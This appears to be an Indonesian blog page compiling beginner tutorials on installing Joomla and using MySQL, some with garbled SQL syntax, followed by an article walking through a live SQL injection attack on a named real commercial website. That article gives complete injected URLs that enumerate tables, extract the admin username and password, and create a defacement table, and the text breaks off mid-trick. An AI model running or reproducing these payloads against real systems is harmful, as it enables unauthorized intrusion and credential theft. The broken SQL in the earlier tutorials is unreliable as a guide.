Jumat, 09 Januari 2009

engenalan Joomla, dari dan untuk pemula

Pengenalan Joomla, dari dan untuk pemula

Agustus 3, 2007 in Web

Pendahuluan
Joomla adalah salah satu CMS (Content Management System) terkenal yang bersifat cepat, praktis, dan mudah. Anda tidak perlu membuat kode-kode program yang rumit untuk membuat suatu aplikasi web yang interaktif dan menggunakan database, dengan Joomla anda hanya perlu memahami penggunaan fitur-fitur yang telah di sediakan aplikasi web ini dan mengaturnya sesuai kebutuhan atau keinginan anda.

Persiapan
Agar kita dapat menjalankan Joomla, kita perlu menyediakan beberapa program aplikasi yaitu:
1. Paket Joomla (cari dengan Google, free koq)
2. Aplikasi Web Server (Apache, IIS, dll)
3. Aplikasi database (MySQL, Microsoft SQL Server, dll)
4. PHP 4.2.x atau di atasnya
5. Dan tentu saja web browser (IE, Firefox, Opera, dll)
Karena saya masih pemula dan senang akan hal-hal yang simple dan tidak ingin pusing-pusing mengenai masalah setting-an web server ataupun database yang rumit atau terlalu panjang untuk dibahas disini, jadi saya menggunakan paket distribusi khusus yang telah dibundel dengan tiga aplikasi (Apache, MySQL, dan PHP) penting untuk menjalankan Joomla yaitu XAMPP. Untuk mencari aplikasi XAMPP ini silahkan cari dengan uncle Google :) . Cara penginstalan XAMPP sangat mudah, kita tinggal ikutin aja langkahnya, istilah simplenya ok – next – install – yes – yes – yes – finish, selesai dech :) (oh ya, saya menggunakan OS Micr*s*ft XP) dan perlu diingat percobaan untuk tutorial ini bersifat localhost jadi bagi yang ingin menggunakan Joomla sebagai web service untuk digunakan langsung online di internet, maka dalam pembuatan databasenya agak berbeda itu tergantung tempat anda hosting, tapi ada beberapa tempat hosting gratis (yang pasti mendukung fasilitas PHP, database, lebih bagus lagi kalau ada FTP) yang menyediakan langsung paket Joomla, anda hanya tinggal membuat database nya saja.

Memulai Pengenalan Joomla

Penempatan paket Joomla
Pastikan aplikasi XAMPP udah terinstall dengan baik, kemudian kita akan menuju folder tempat kita menginstall XAMPP sebelumnya, yaitu C:\Program Files\xampp\htdocs, di dalam folder htdocs extract paket Joomla, di sini file-file joomla saya letakkan dalam satu folder yang bernama myjoomla. Untuk aplikasi XAMPP kita harus menempatkan file-file Joomla kita di dalam folder htdocs, hal ini sama saja jika kita menggunakan Linux dengan apache sebagai servernya yang peletakan filenya di /var/www/html/myjoomla.

Membuat database untuk Joomla
Buka web browser anda, pada kolom address ketikan: http://localhost/xampp/ maka akan tampil tampilan utama dari aplikasi XAMPP, kemudian kita pilih menu Tools -> phpMyAdmin.

Maka akan muncul tampilan seperti diatas, pada kolom Create new database ketikan nama database yang akan kita buat, misalnya db_joomla kemudian klik button Create maka akan tercipta sebuah database (kita tidak perlu membuat suatu table untuk database karena telah ter-include bersamaan dengan paket Joomla).
Perlu di ingat user name utama bawaan dari paket XAMPP untuk phpMyAdmin adalah root sedangkan passwordnya masih kosong, hal ini sangat penting saat penginstalan Joomla nanti (saat percobaan saya tidak melakukan pengaturan user, jadi menggunakan default-nya saja, untuk pengaturan user ini anda dapat melihatnya pada phpMyAdmin bagian menu Privileges).

Penginstalan Joomla
Pada web browser anda ketikan http://localhost/myjoomla (myjoomla adalah nama folder di dalam htdocs tempat anda meletakan file-file Joomla anda). Maka akan muncul tampilan sebagai berikut:

Disini kita dapat melihat directory-directory yang terdapat di Joomla yang sudah siap untuk ditulis/dijalankan (lihat status Writeable). Kemudian lanjutkan dengan mengklik Next>>.
Maka akan muncul Joomla Installation License yang menyatakan bahwa Joomla berada di bawah lisensi GNU/GPL.

Klik Next>>, kemudian akan muncul bagian untuk konfigurasi database MySQL.

Isikan contentnya sebagai berikut :
Host Name: localhost
MySQL User Name: root
MySQL Password:
MySQL Database Name: db_joomla
Kemudian lanjutkan dengan mengklik Next>>, maka akan tampil peringatan dari Joomla apakah settingan yang kita buat sudah benar, jika ya klik OK.

Jika sukses, maka akan tampil bagian untuk memasukan nama web Joomla anda, misalnya : Fazz Sawamura Homepage.

Lanjutkan dengan mengklik Next>>, maka akan tampil konfirmasi mengenai situs URL, path, email, dan admin password.

Pada bagian email, isikan email anda dan jangan lupa untuk mengingat password admin, hal ini sangat penting untuk anda login sebagai admin untuk melakukan pengaturan Joomla nanti (password ini dapat diganti sesuai keinginan anda).
Kemudian klik Next>>, maka akan tampil akhir dari instalasi Joomla, dan ada peringatan untuk menghapus folder instalasi.

Pilih View Site, maka akan tampilan sebagai berikut

Site Joomla belum bisa ditampilkan karena kita belum menghapus file-file instalasi kita, untuk itu kita kembali ke directory C:\Program Files\xampp\htdocs\myjoomla, kemudian delete folder dengan nama installation.
Refresh kembali web browser anda maka site Joomla sudah dapat ditampilkan :) ,

Sekian dulu untuk pengenalan awal mengenai Joomla, mungkin tutorial ini masih jauh dari sempurna. Tutorial mengenai Joomla berikutnya akan segera dibuat (kalau lagi ada waktu, atau lagi nggak malas he..x3 ;) )

Joomla, Script Gratis Yang Handal Untuk Membuat Website

Joomla, Script Gratis Yang Handal Untuk Membuat Website
post info
Oleh budiridwin
Kategori: Artwork, Internets dan Webdesign dan Website
Tags: CMS, gratis, handal, joomla

Bingung harus posting apa lagi di blog ini, setelah membaca tulisan dari Bapak Budi Putra tentang topik “NICHE”. Akhirnya saya mencoba memutuskan untuk berbagi pengalaman didalam penggunaan Joomla CMS yang merupakan CMS favorit saya saat ini dan sejak beberapa tahun lalu ketika masih bernama mambo.

Sebelum saya berbagi pengalaman saya dalam menggunakan Joomla CMS ada baiknya saya menceritakan sedikit apa yang dimaksud dengan CMS dan Joomla.

CMS (Content Management System) merupakan suatu aplikasi berbasis web yang digunakan untuk mengatur suatu konten/isi dari suatu website. lebih lanjut ….

Joomla merupakan CMS open source yang pertama kali dikembangkan oleh miro dengan nama Mambo. Dalam perjalanannya ternyata miro membuat yayasan mambo (Mambo Foundation) dan mewajibkan para pengembang yang terlibat dalam pengembangan joomla membayar, dan terkesan mambo akan dikomersialkan. Setelah kejadian tersebut akhirnya terjadi perpecahan di pengembang inti mambo dan sejak 16 September 2005 Joomla versi 1.0.0 resmi dirilis.

Dengan dirilisnya Joomla memberikan kebebasan kepada para pengembang-pengembang mambo untuk terlibat juga didalam pengembangan joomla. Kini perkembangan joomla lebih pesat dibandingkan mambo. Banyak instansi pemerintah, pendidikan, maupu korporat menggunakan Joomla untuk mengatur isi dari website yang mereka kelola.

Berikut ini contoh beberapa website yang menggunakan Joomla CMS :

Perintah praktis MySQL

Perintah praktis MySQL

Bagi anda yang menggunakan MySQL sebagai Basis Data sistem anda, ada beberapa perintah praktis yang dapat diterapkan setelah masuk ke prompt MySQL.
Untuk masuk ke prompt My SQL dapat dilakukan dengan mengetikan perintah :
unix # mysql
Setelah di prompt mySQL anda tinggal mengetikkan perintah-perintah praktis yang anda kehendaki. Perintah praktis tersebut diantaranya:
1. Menggunakan database yang ada:
mysql> use name_database;
2. Buat databse baru:
mysql> create database nama_database;
3. Buat tabel Baru:
mysql>create table nama_tabel deskripsi_field;
mysql>create table tabelku nama char(30 not null,nim int not null,tgl date not null;
4. Edit tabel:
mysql alter tabel nama_tabel,[add|chane|delete] deskripsi_field;
5. Hapus tabel:
mysql>drop table nama_tabel;
6. Buat data baru:
mysql> insert into nama_tabel (field1,field2,...) values (nilai1,nilai2,...) [where...];
insert into tabelku (nama,nim,tgl) values(dian, 100, 22/02/1980 divkom);
7. Ubah data :
mysql>update table nama_tabel set [field]=[nilai][where..];
8. Hapus Data:
mysql>delete from nama_tabel [where...];
9. Menampilkan tabel dalam database mysql:
mysql> show tables from mysql;
10. Melihat kolom-kolom field dalam table user:
mysql>show fields from user from mysql;
11. Melihat Host, User, Password yang telah diisi secara otomatis
mysql>select Host,use,Password from user;
12. Mengganti password root:
mysql> update user set password=password(mysqladmin where user=root;
13. Hapus entry yang tidak ada user/passwordnya, untuk keperluan security. jangan sampai akses tanpa user bidsa masuk:
mysql> delete from user where user= ;
14. Melihat informasi previlige dari user root:
mysql>select *from user where host=localhost;
15. Menambahkan user baru ke tabel user:
mysql>insert into user values(akhdian.net, dian,password(dian),Y,Y,Y,Y,Y,Y,Y.Y,Y,Y);
16. Agar konfigurasi user terbaru bisa aktif, beri perintah reload:
unix#mysqladmin reload

by: akhdian : dian ardiyansah

Perintah dasar dalam database MySQL

Perintah dasar dalam database MySQL

MYSQL

Wed 2008 at 14:09 pm by Yustian M

Sekarang aku akan melanjutkan bagian kedua dari tutorial database MySQL. Yang mana pada bagian sebelumnya aku telah menulis Struktur dasar database MySQL. Semua tutorial ini akan aku bahas dengan simple agar kamu semua dapat dengan mudah untuk memahami. Apabila ada dari tulisan atau yang kurang di mengerti dari tutorial ini, silahkan berikan comment kamu.

SQL DASAR

* Membuat database baru.
* Membuat table baru.
o Type column
o Indexes dan Keys
* Manipulasi data.
o Inserting
o Retrieving
o Updateing
o Deleting
* Mengubah table.

1. Membuat Database Baru

* Menampilkan database

mysql> SHOW DATABASES;

* Membuat database

mysql> CREATE DATABASE [Nama databasemu];

* Menggunakan database

mysql> USE [Nama databasemu];

* Menghapus database

mysql> DROP DATABASE [Nama databasemu];

2. Membuat Table Baru

* Menampilkan table

mysql> SHOW TABLES FROM [Nama databasemu];

* Membuat table

mysql> CREATE TABLE [Nama tablemu] ( [nama column] [type column], [...]);

Contohnya:

mysql> CREATE TABLE anggota ( ID int(100), Nama varchar(255));

* Menampilkan column

mysql> SHOW COLUMNS FROM [Nama tablemu];

* Menghapus table

mysql> DROP TABLE [Nama tablemu];

Type column yang umum digunakan dalam MySQL:

* Type String
o char
o varchar
o text
o blob
* Type Numeric
o int
o tinyint
o int zerofill
o int not null
o float
o double
o decimal

Menambahkan Indexing dan Keys kedalam Table:

mysql> ALTER TABLE [Nama tablemu] ADD INDEX ([Nama column yang ingin diberikan index]);

Contohnya:

mysql> ALTER TABLE anggota ADD INDEX (Nama);

mysql> CREATE TABLE [Nama tablemu] ( [nama column] [type column], [...],PRIMARY KEY ([nama column yang ingin diberikan key]));

Contohnya:

mysql> CREATE TABLE anggota ( ID int(100), Nama varchar(255),PRIMARY KEY (ID));

3. Manipulasi Data

* Memasukan data

mysql> INSERT INTO [Nama tablemu] ([Nama column]) VALUES ([Isi/Nilai column]);

Contohnya:

mysql> INSERT INTO anggota (ID, Nama) VALUES (1,”Yustian”);

* Mengupdate data

mysql> UPDATE [Nama tablemu] SET [Nama column]=[Isi/Nilai column] WHERE [Kondisi yang data diinginkan];

Contohnya:

mysql> UPDATE anggota SET Nama=“Yustian” WHERE ID=1;

* Menghapus data

mysql> DELETE FROM [Nama tablemu] WHERE [Kondisi yang data diinginkan];

Contohnya:

mysql> DELETE FROM anggota WHERE ID=1;

4. Mengubah Table

* Mengganti nama table

mysql> ALTER TABLE [Nama tablemu] RENAME [Nama yang baru];

Contohnya:

mysql> ALTER TABLE anggota RENAME anggotaku;

* Menambah column ke dalam table

mysql> ALTER TABLE [Nama tablemu] ADD [nama column] [type column], [...];

Contohnya:

mysql> ALTER TABLE anggota ADD Nama char(100);

* Menghapus column

mysql> ALTER TABLE [Nama tablemu] DROP [nama column];

Contohnya:

mysql> ALTER TABLE anggota DROP Nama;

* Mengganti nama dan type column

mysql> ALTER TABLE [Nama tablemu] CHANGE [nama column] [Nama column yang baru] [type column], [...];

Contohnya:

mysql> ALTER TABLE anggota CHANGE Nama Username varchar(255);

Demikian sebagian mengenai MySQL masih banyak lagi artikel yang akan aku tulis di YusianBlog ini diantaranya Operator Di Dalam MySQL, Query MySQL dan masih banyak lagi. Semoga itu semua dapat membantu kalian untuk belajar MySQL dengan mudah.

Popularity: 33% [?]
Related Posts

* Struktur dasar dalam database MySQL (2)
* Cara mudah upgrade wordpress 2.7 Coltrane terbaru (2)
* Membuat website menjadi transparan dengan css (8)
* Menambahkan tomcat administration tool pada apache tomcat 5.5.27 (6)
* Cara lengkap instalasi apache tomcat 5.5.27 di windows XP (1)

Membuat Database dan Table Menggunakan MySqL

Membuat Database dan Table Menggunakan MySqL

September 10, 2008 in Windows | Tags: Database Windows

Untuk masuk ke dalam program MySQL pada prompt jalankan perintah berikut ini:

1. Masuk pada direktori utama mysql, seperti perintah berikut:

C:\WINDOWS>cd\apache\mysql\bin

2. Kemudian ketikkan perintah seperti contoh berikut:

C:\apache\mysql\bin>mysql

Kemudian akan masuk kedalam prompt MySQL seperti tampilan dibawah ini:

1. Cara untuk membuat sebuah database sekolah baru, mengaktifkan database sekolah, dan membuat table instruktur menggunakan perintah sebagai berikut:

Ketik:

Mysql> create database sekolah;

Query OK, 1 row affected (0.01 sec)

Mysql> use sekolah

Database changed

Mysql> create table instruktur(

è nomor int(6) not null primary key,

è nama char(40) not null,

è jenis_kelamin char(25) not null,

è alamat char(255) not null,

è kota char(20) not null);

Query OK, 0 rows affected (0.38 sec)

2. Untuk memasukkan sebuah baris (record) kedalam table MySQL adalah sebagai berikut:

Ketik:

Mysql> insert into instruktur

è Values(‘1’,’Nanang Suwandi’,’Laki-Laki’,’Jl. Pekapuran’,

è ‘Depok’);

Query OK, 1 row affected (0.34 sec)

Mysql> insert into instruktur

è Values(‘2’,Ramadhin Tarigan’,’Laki-Laki’,’Jl. Pemda Bogor’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

Mysql> insert into instruktur

è Values(‘3’,Agung Setiadi’,’Laki-Laki’,’Jl. Cibinong’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

3. Untuk menampilkan isi table menggunakan perintah SELECT, cara penulisan perintah SELECT adalah:

Ketik:

Mysql> select*from instruktur;

4. kemudian cara untuk membuat table siswamenggunakan perintah sebagai berikut:

Ketik:

Mysql> create table siswa(

è nomor int(6) not null primary key,

è nama char(40) not null,

è jenis_kelamin char(25) not null,

è alamat char(255) not null,

è kota char(20) not null);

Query OK, 0 rows affected (0.38 sec)

5. Untuk memasukkan sebuah baris (record) kedalam table MySQL adalah sebagai berikut:

Ketik:

Mysql> insert into siswa

è Values(‘1’,’Singgih Maryu Aji’,’Laki-Laki’,’Jl. Anggrek 06’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

Mysql> insert into siswa

è Values(‘2’,Iwan Sanjaya’,’Laki-Laki’,’Jl. Radar Auri’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

Mysql> insert into siswa

è Values(‘3’,Saiful Wahyudi’,’Laki-Laki’,’Jl. Garuda’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

Mysql> insert into siswa

è Values(‘4’,Wahyu Setiadi’,’Laki-Laki’,’Jl. Ciherang’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

6. Untuk menampilkan isi table menggunakan perintah SELECT, cara penulisan perintah SELECT adalah:

Ketik:

Mysql> select*from siswa;

7. kemudian cara untuk membuat table mata_pelajaran menggunakan perintah sebagai berikut:

Ketik:

Mysql> create table siswa(

è nomor int(6) not null primary key,

è nama char(40) not null,

è jenis_kelamin char(25) not null,

è alamat char(255) not null,

è kota char(20) not null);

Query OK, 0 rows affected (0.16 sec)

8. Untuk memasukkan sebuah baris (record) kedalam table MySQL adalah sebagai berikut:

Ketik:

Mysql> insert into mata_pelajaran

è Values(‘1’,’Nur Sidik’,’Laki-Laki’,’Jl. Jati Jajar’,

è ‘Depok’);

Query OK, 1 row affected (0.06 sec)

Mysql> insert into mata_pelajaran

è Values(‘2’,Sri Mulyani’,’Laki-Laki’,’Jl. Cijantung’,

è ‘Depok’);

Query OK, 1 row affected (0.00 sec)

Mysql> insert into mata_pelajaran

è Values(‘3’,Abdul Rosyid’,’Laki-Laki’,’Jl. Cililitan’,

è ‘Depok’);

Query OK, 1 row affected (0.01 sec)

9. Untuk menampilkan isi table menggunakan perintah SELECT, cara penulisan perintah SELECT adalah:

Ketik:

Mysql> select*from mata_pelajaran;

mengenai RDBMS Mysql,

mengenai RDBMS Mysql,

Hari ini kita belajar mengenai RDBMS Mysql, tapi pada pertemuan tadi yang seharusnya kita ujian, tapi gak tau mengapa sampai dibatalkan. Kita sempat membahas ulang tentang cookie dan session.



Tujuan materi ini agar kita dapat memahami tentang DBMS MySQL, kemidian menggunakan perintah SQL untuk mendefinisikan basis data dan memanipulasi data. Program yang kita gunakan poada hari ini yaitu command prompt, dimana kita membuat folder, table dll melalui command promp.



Database adalah sebuah objek yang kompleks untuk menyimpan informasi yang terstruktur, yang diorganisir dan disimpan dalam suatu cara yang mengijinkan pemakainya untuk mengambil informasi dengan cepat dan efisien. Dengan mesin database, kita bias merancang aturan untuk melindungi database dari tindakan pemakai dan meminta DBMS untuk menerapkan aturan-aturan tersebut.



MySQL adalah multi user database yang menggunakan bahasa structured query language. Dalam operasi client server melibatkan server daemon MySQL, disisi menangani data yang bebagai macam program serta library yang berjalan disisi client. MySQL mampu untuk menangani data yang cukup besar. Perusahaan yang mengembangkan MySQL adalah TeX.



Dalam konteks bahasa SQL, pada umunya informasi tersimpan dalam table-tabel yang secara logic merupakan struktur dua dimensi yang terdiri atas baris-baris data yang berada dalam suatu atau lebih kolom. Baris pada table sering disebut sebagai instance dari data atau record, sedangkan kolom sering disebut sebagai attributes atau field. Keseluruhan itu ditampung dalam suatu wadah yang disebut database.







Structured Query Language

SQL adalah bahasa yang dpergunakan untuk mengakses data dalam basis data relational. Bahasa ini adalah bahasa standar yang digunakan dalam manajemen basis data relatyional. Saat ini hampir semua server basis data yang ada mendukung bahasa ini dalam mamnajemen datanya.

Jenis-jenis perintah SQL antara lain seperti yang terdapat dibawah ini:

Ø QUERY COMMAND à Yaitu perintah SQL yang merupakan satu-satunya cara untuk berkomunikasi denga database server.

Ø Data definition language à Yaitu perintah untuk mendefinisikan data, misalnya : create, alter, drop.

Ø Data control language à untuk mengatur privilege user ( administrasi database ).

Ø Data manipulation language à perintah-perintah yang digunakan untuk menampilkan data dan dapat menyebabkan perubahan data, misalnya : select, insert, update, delete.



Menjalankan MySQL

Untuk menjalankan MySQL, akan kita gunakan cara seperti contoh dibawah ini.
































Melihat Daftar Database

Dengan perintah show databases; mysql akan mengirimkan informasi mengenai nama-nama database yang terdapat pada DBMS MySQL Server yang sedang bekerja. Berikut ini contoh perintah untuk menampilkan daftar databases yang ada.


























Membuat Database

Untuk membuat databases pada mysql, bias dengan cara menuliskan “create database ;”. Pada tampilan diatas sudah terdapat dua databases yang sudah ada. Kalo kita belum terlalu jelas menggunakan mysql sebaiknya kita jangan mengganggu dua databases tersebut.

























Masuk database

Cara untuk memasuki database yang telah kita buat dengan menuliskan : “use ”. Contoh:


























Mengahpus database

Cara menghapus databases daengan cara menuliskan: “ drop database ”. Contoh:


































Tabel

Table adalah tempat untuk menyimpan data 2 dimensi yang terdiri dari kolom dan baris, struktur table berupa kolom-kolom ataui field-field, tipe data dan ukuran mesing-masing kolom. Untuk mmempersiapkan struktur table diperlukan perintah-perintah untuk membuat table, mengubah tipe data, memberikan atribut, dan sebagainya. Cara membuat table dengan menuliskan. “CREATE TABEL ( [],…);”. Contohnya ;


























Melihat daftar table

Untuk melihat table yang berada dalam database. Caranya seperti contoh dibawah ini.


























Melihat struktur table

Untuk melihat struktur table dapat dilakukan dengan cara berikut.




























Cara mengganti nama table, kita gunakan cara seperti contoh di bawah ini.















Menambah kolom.

Untuk menambah kolom pada table yang sudah kita buat, dilakukan dengan perintah pada contoh dibawah ini.




























Jika ingin menghapus kolom, menggunakan cara sebagai berikut.




































Manipulasi data table

Isi atau data dalam table sering disebut baris, row atau record, untuk melkaukan manipulasi data digunakan SQL yuang berkategori data manipulation language, yang meliputi proses :

Ø Penambahan Data / insert

Ø Penghapusan Data/ delete.

Ø Penggantian Data/ update.



Penambahan data

Untuk menambahkan data atau memasukan data kedalam table kita dilakukan dengan cara insert into.

Keterangan:

Ø Jika yang akan diisi semua kolom, maka nama kolom tidak perlu disebutkan.

Ø Jika nama kolom tidak disebutkan, maka nilai yang dimasukan harus mempenyai urutan yang sama seperti table pada waktu ditampilkan strukturnya dengan perintah DESC.

Contohnya:




































Untuk table yang kita buat:


























Jika yang diisikan tidak semua kolom, maka nama-nama kolom harus disebutkan. Demikian juga jika akan diisi sengan urutn berbeda maka nama kolom harus disebutkan dengan urutan yang sesuai.



Menampilkan data

Untuk menampilkan hanya data yang kita inginkan adalah dengan cara menggunakan perintah SELECT, dan mengganti tulisan * dengan nama kolom. Contohnya:




























Menghapus data

Untuk menghapus data harus menggunakan klausa WHERE, jika tidak maka semua data akan dihapus. Bentuk umum perintah untuk menghapus data adalah sebagai berikut.


























Mengganti data

Untuk mengganti data klausa WHERE juga sangat penting, sebab seperti perintah DELETE jika klausa tersebut tidak diberikan, maka semua baris akan mengalami perubahan data. Contohnya:

Explore SQLi untuk mendapatkan struktur table pada ASP – SQL Server

Explore SQLi untuk mendapatkan struktur table pada ASP – SQL Server
Oleh new-bee
Published: Desember 9, 2008
Updated: Desember 9, 2008

Disana sini sudah banyak sekali dibahas bagaimana mendapatkan struktur table dari sebuah web yang dibangun dengan menggunakan PHP dan MySQL. Dan artikel ini saya bahas bagaimana kita bisa mendapatkan informasi table pada web yang dibangun dari ASP dan SQL Server. Dari pengalaman saya selama ini yang bekerja dengan SQL Server, SQL Server mendukung mendukung penggunaan ”MULTI QUERY” yang mana memberikan keleluasaan bagi kita untuk melakukan select,update,delete,bahkan drop table – query yang krusial bisa kita lakukan..

Sebelum saya membahas cara-cara untuk mendapatkan struktur table, alangkah baiknya jiika saya menjelaskan sedikit tentang struktur table di SQL Server…

Dasar Struktur Table SQL.Disini saya akan mengajak sodara sekalian untuk mengeksplorasi sebuah database dengan nama Northwind (database bawaan saat install SQL Server)

Dimanakah SQL Server menyimpan semua informasi tabel database tersebut ? SQL Server menyimpan informasi tabel pada sebuah tabel khusus yang diberinama sysobjects dan syscolumns. Apa itu tabel sysobjects ? tabel sysobjects adalah tabel yang menyimpan seluruh informasi mengenai tabel dan tabel syscolumns adalah tabel yang menyimpan seluruh informasi mengenai column2 pada tabel..



Waah... aku gak ngerti apa tuh isinya, bingung gimana nyarinya...” Tenang disinilah trik tersebut dibutuhkan... Kita buka SQL Query Analizer. Kita jalankan Query berikut

SELECT sysobjects.name FROM sysobjects (NOLOCK)

WHERE sysobjects.type = 'U'

Dan apa yang didapatkan itu merupakan semua tabel yang dibuat oleh user (sysobjects.type = `U`)

Bagaimana kita mengetahui field-field yang ada pada tabel tersebut? Coba kita modifikasi sedikit script tersebut yang nantinya akan menghasilkan informasi tabel

SELECT sysobjects.name AS tablename, syscolumns.name AS columnname

FROM sysobjects (NOLOCK)

INNER JOIN syscolumns (NOLOCK) ON sysobjects.id = syscolumns.id

WHERE sysobjects.type = 'U'

ORDER BY sysobjects.id ASC ,syscolumns.colid ASC

sysobjects.id adalah field yang mengisi id dari tabel dan syscolumns.colid adalah field yang berisi informasi id dari column di tiap tabelnya

Bandingkan dengan screen shoot tabel aslinya dibawah ini. Apakah ada perbedaan? Aku rasa tidak...

Implementasi pada website

Pada bab ini saya akan menjelaskan dengan semampu saya bagaimana kita melakukan explorasi pada sebuah celah website untuk mendapatkan semua sturktur table.Tentunya sudah tidak asing dengan SQL Injection. Disini saya akan implementasikan query diatas untuk mendapatkan struktur table dari sebuah database website.Dan tentunya akan saya berikan sedikit trik-trik kuno.Saya melakukan googling site yang mengunakan ASP dan aku dapatkan 1 website yang bisa di explore. Demikian langkah2 saya melakukan exploring :

1) saya gunakan tanda single quote ( ' ) emang karakter 1 ini bener2 ampuh, dan hasil yang saya dapat adalah pesan error

http://www.dagangasia.com.my/directory/directorydetail.asp?intID=1’5--&t=1

2) gotcha… we have a target now…

pertama saya gunakan query order dulu untuk menemukan banyaknya column yang di panggil yah. Mulai dari ORDER BY 1 sampai ORDER BY n yang menghasilkan error. Dan disini saya mendapatkan error saat Query ORDER BY 20 -- . jadi saya asumsikan ada 19 column yang di select

http://www.dagangasia.com.my/directory/directorydetail.asp?intID=15 ORDER BY 20 --&t=1



3) Setelah kita melakukan query ORDER, disini kita harus pastikan lagi dengan menggunakan query UNION SELECT. Kira2 querynya adalah begini.

UNION SELECT ‘1’,’2’,’3’,’4’,’5’,’6’,’7’,’8’,’9’ - ,’19’


http://www.dagangasia.com.my/directory/directorydetail.asp?intID=15 UNION SELECT '1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19';--&t=1

Berharap mendapatkan sesuatu yang berharga, tapi apa yang aku dapatkan adalah error. Mulai memutar otak kembali dan akhirnya melakukan select manual :)
Akhirnya berhasil, Query sukses di execute pada SELECT 9 column

http://www.dagangasia.com.my/directory/directorydetail.asp?intID=15 UNION SELECT '1','2','3','4','5','6','7','8','9';--&t=1



4) LEST GO … cari cari table… :D
untuk mencari tabel kita gunakan query yang sudah saya bahas pada dasar SQL diatas.Sayang sekali di SQL Server tidak ada function yg sejenis dengan group_concat milik MySQL. Jadi disini kita harus melakukan select 1 / 1

http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT sysobjects.name, sysobjects.id,'3','4','5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id ;--&t=1

wohoho langsung ketemu table admin



kalo ingin mengexplorenya tinggal tambahkan pada query
WHERE sysobjects.id > … kira2 SQL nya seperti ini



SELECT sysobjects.name, sysobjects.category,'3','4','5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id WHERE sysobjects.id > [sysobjects.id yang tampil]



http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT sysobjects.name, sysobjects.category,'3','4','5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id WHERE sysobjects.category > 453576654 ;--&t=1

hasilnya adalah seperti ini



dari execute query diatas didapatkan table banner dengan id = 1829581556, kita bisa lanjutkan untuk mendapatkan semua tabelnya contoh :



http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT sysobjects.name, sysobjects.category,'3','4','5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id WHERE sysobjects.category > 1829581556 ;--&t=1



dan kita mendapatkan table selanjutnya…..



5) Kita ambil table admin tadi yah, lalu kita select field2nya. Querynya diubah dong kira2 begini nanti SELECT Querynya





SELECT sysobjects.name, sysobjects.category, syscolumns.name,'4','5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id WHERE sysobjects.name = ‘admin’



http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT sysobjects.name, sysobjects.category,syscolumns.name ,'4','5','6','7','8','9' FROM sysobjects INNER JOIN syscolumnssyscolumns.id = sysobjects.id WHERE sysobjects.name = 'admin' ;--&t=1 ON

bagaimana kita mendapatkan semua column ? ß good question…
pada table syscolumns disediakan field yang namanya colid (column id) disanalah kita explore

Jadi Querynya kita rubah

SELECT sysobjects.name, sysobjects.category, syscolumns.name, syscolumns.colid,'5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id WHERE sysobjects.name = ‘admin’ AND syscolumns.colid = 1



Kita coba implementasikan wekeke :)

http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT sysobjects.name, sysobjects.category,syscolumns.name, syscolumns.colid,'5','6','7','8','9' FROM sysobjects INNER JOIN syscolumns ON syscolumns.id = sysobjects.id WHERE sysobjects.name = 'admin' AND syscolumns.colid = 2 ;--&t=1



6) Saya rasa cukup exploring nya, dan disini finishing touchnya kita select dari field dan table yang sudah kita dapatkan tadi sodara SQLnya kira kira begini

SELECT vcAdmin, vcPassword, '3','4','5','6','7','8','9' FROM admin


dan hasilnya adalah yeah password dan user untuk login sebagai super admin



7) Ada lagi gak yang lebih asik dari itu ? ß tentu ada dong
1. Create database à bisa
2. Insert à bisa
3. Drop tabel à bisa dong

Contoh yang lebih asik adalah sebagai berikut. Saya akan membuat table dengan nama hacked lalu insert ke table



CREATE TABLE hacked (isgoingbad varchar (100) , gottcha varchar (2000));INSERT INTO hacked VALUES ('new-bee','new-bee was found a SQL Injection Bugs on this site, but new-bee didn''t want to explore, anybody want to explore it?
yeah monggo silahkan...

dedicate to all indonesian hacker

best regard
new-bee');--



Kita tinggal mengaplikasikan dan mengeksekusinya


http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0; CREATE TABLE hacked (isgoingbad varchar (100) , gottcha varchar (2000));-- INSERT INTO hacked VALUES ('new-bee','new-bee was found a SQL Injection Bugs on this site, but new-bee didn''t want to explore, anybody want to explore it?
yeah monggo silahkan...

dedicate to all indonesian hacker

best regard
new-bee');--&t=1



dan hasilnya bisa dilihat di sini



http://www.dagangasia.com.my/directory/directorydetail.asp?intID=0 UNION SELECT isgoingbad,'2','3','4','5','6','7','8',gottcha FROM hacked;--&t=1

Tips dan Trik



Disini saya akan berbagi sedikit trik, terutama saat kita melakukan select struktur table dan struktur column. Sayang sekali SQL tidak dilengkapi dengan function group_concat seperti pada MySQL, tetapi bukan berarti kita bisa melakukan manipulasi dengan segala cara.. jadi ingat kata2 om S’to di bukunya... banyak jalan menuju roma J



Saya sudah mencoba membuat sebuah query yang kira2 bentuknya akan begini

DECLARE @x varchar(8000)
SELECT @x = COALESCE(@x + ', ','') + sysobjects.name FROM sysobjects (NOLOCK) WHERE sysobjects.type = 'U'
SELECT @x

Dan Query diatas berhasil kita bisa membuat function yang mirip dengan group_concat milik MySQL

Lalu bagaimana agar kita bisa melakukan SELECT dengan UNION ? Jawabannya adalah, kenapa kita tidak membuat sebuat table dan memasukan hasil select kedalam tabel dan kita melakukan SELECT dari table yang kita buat. Bingung ? udah langsung aja deh



1. Pertama adalah kita membuat sebuah table, saya rasa semua tahu bagaimana cara membuat. Query untuk membuat table adalah

CREATE TABLE test (fieldtest text);

